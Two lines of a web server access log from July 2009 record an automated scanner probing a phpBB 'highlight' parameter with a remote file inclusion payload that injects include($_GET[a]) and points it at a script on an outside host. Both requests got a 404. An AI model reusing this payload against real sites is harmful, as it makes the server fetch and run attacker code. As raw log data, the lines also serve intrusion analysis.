83.16.182.130 - - [20/Jul/2009:03:35:21 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
83.16.182.130 - - [20/Jul/2009:03:35:23 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
